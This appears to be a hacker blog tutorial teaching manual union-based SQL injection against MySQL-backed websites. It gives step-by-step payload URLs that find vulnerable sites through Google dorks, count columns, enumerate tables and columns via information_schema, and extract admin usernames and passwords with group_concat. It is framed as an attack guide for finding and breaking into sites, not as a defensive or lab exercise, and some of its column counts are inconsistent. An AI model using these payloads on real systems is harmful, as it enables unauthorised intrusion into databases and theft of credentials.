Union-Based SQL Injection Method | BY MR:47{XYBER SHEIKH}

!** UNION-BASED SQL INJECTION** !




I am going to teach you SQL Injection (Union-Based). I'll not teach you SQLi from automated SQLi tools! Just because pro hackers use manual. Tools are for kiddies ^_^ ...!

So lets start!

Step 1: First of all you need to find a SQLi vul site. You can use Google Dorks (inurl:index.php?id= .. inurl:page.php?id= etc.) or for Dorks "Click Here"  

To check that if the site is vul or not, you have to put a ' on the end of the URL.
If the page shows a SQL error that the site is vul. 

Step 2: Next, we have to find the number of columns! We will use the ORDER BY method!
Like this :

http://www.site.com/index.php?id=12-- order by 1 (no error)
http://www.site.com/index.php?id=12-- order by 2 (no error)
http://www.site.com/index.php?id=12-- order by 3 (no error)
http://www.site.com/index.php?id=12-- order by 4 (error)

  • Means that the site have 3 columns!
Step 3: Now we have to find the most vul. column. For this, I'll use the UNION ALL SELECT method!
Like this:
 http://www.site.com/index.php?id=-12 union all select 1,2,3,4--

  • it will show some numbers ... the most bold one is the most vulnerable!
Step 4: Now we have to extract some information ^_^ :3

  • Remove the most vulnerable column and enter your command there like this ...

http://www.site.com/index.php?id=-12 union all select 1,@@version,3,4--

Here are Some CMD For Fetch Data On Website:-
Variable/Function        Output
@@hostname    :            Current Hostname
@@tmpdir    :            Tept Directory
@@datadir    :            Data Directory
@@version    :            Version of DB
@@basedir    :            Base Directory
user()        :            Current User
database()    :            Current Database
version()    :            Version
schema()    :            current Database
UUID()        :            System UUID key
current_user()    :        Current User
current_user    :        Current User
system_user()    :        Current Sustem user
session_user()    :        Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl    :    Check if it have ssl or not

Step 5: Next, we have to extract tables...

Like this :-
http://www.site.com/index.php?id=-12 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--

  • Now These are all table of the database…
Step 6: Now we have to extract columns ...

 replace the “group_concat(table_name) with the “group_concat(column_name)”
Replace the “from information_schema.tables where table_schema=database()–” with 
“FROM information_schema.columns WHERE table_name=mysqlchar–"
Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:

First of all install the HackBar addon:
Now
select sql->Mysql->MysqlChar()
This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click OK Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
 Copy and paste the code at the end of the url instead of the “mysqlchar”

For example:
http://www.site.com/index.php?id=-2 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Now it will show the list of columns.

like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now  replace "group_concat(column_name)" with "group_concat(columnname,0x3a,anothercolumnname)".
Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”
For example:

http://www.site.com/index.php?id=-2
and 1=2 union select 1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7 from admin--


Now it will Show Username and passwords.

Enjoy..


No comments: